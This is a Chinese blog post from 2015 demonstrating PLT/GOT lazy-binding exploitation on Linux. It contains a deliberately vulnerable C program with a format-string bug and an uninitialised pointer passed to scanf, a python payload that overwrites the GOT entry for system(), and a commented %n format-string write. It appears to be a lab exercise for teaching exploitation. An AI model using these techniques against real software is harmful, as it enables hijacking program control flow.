linux利用PLT延迟绑定-收到-ChinaUnix博客

收到

首页　| 　博文目录　| 　关于我

收到

博客访问： 17913
博文数量： 2
博客积分： 15
博客等级：民兵
技术积分： 30
用户组：普通用户
注册时间： 2011-07-17 02:00

个人简介

.........................

文章分类

全部博文（2）

General（2）
未分配的博文（0）

文章存档

2016年（1）

2015年（1）

我的朋友

相关博文

linux利用PLT延迟绑定

分类： LINUX

2015-10-21 10:05:50

点击(此处)折叠或打开

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void kkkkkk(char *str)
{
printf(str);
}
void login()
{
int passcode1;
//passcode1变量的值是0x080497a4,也就是GOT中储存system函数地址的地址是080497a4
/*
08048474 <kkkkkk>:
08048474: 55 push %ebp
*/
//那么scanf时输入kkkkkk函数地址0x08048474,十进制134513780。
scanf("%d",passcode1);
//现在修改了GOT中system函数地址为kkkkkk函数地址。
system("fuck\n");
//现在调用system函数就是调用的kkkkkk函数。
}
void welcome()
{
//调试可知,在welcome()函数中name的最后4字节与login()函数中passcode1变量值一样。
char name[12];
printf("GOT system address : ");
//objdump -R kkkkkk
//GOT中储存system函数地址的地址是080497a4 R_386_JUMP_SLOT system
//既然name的最后4字节与login()函数中passcode1变量值一样。
//那么scanf时输入字符串kkkkkkkk+0xa4,0x97,0x04,0x08
scanf("%s", name);
//现在login()函数中passcode1变量的值是0x080497a4
printf("Welcome %s!\n", name);
}
/*
[kkk@localhost GNU-Linux-x86]$ python -c "print('k'*8+'\xa4\x97\x04\x08'+'\n'+'134513780\n')" | ./kkkkkk
GOT system address : Welcome
fuck
*/
int main(int argc, char** argv) {
welcome();
login();
/*
//##############################################################################
//$表示使用第几个参数，%n是一个不经常用到的格式符,它的作用是把前面已经打印的长度写入某个内存地址。
int arr=6;
argv=&arr;
printf("%100d%13$n\n");
//##############################################################################
//利用PLT延迟绑定，修改GOT来改变system函数地址。
argc=*(int*)((char*)system+2);
*((int*)argc)=(int)kkkkkk;
system("hello world\n");
*/
sleep(60000);
return (EXIT_SUCCESS);
}

阅读(1927) | 评论(0) | 转发(0) |

上一篇：没有了

下一篇：Linux堆溢出之fastbin控制malloc返回地址

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6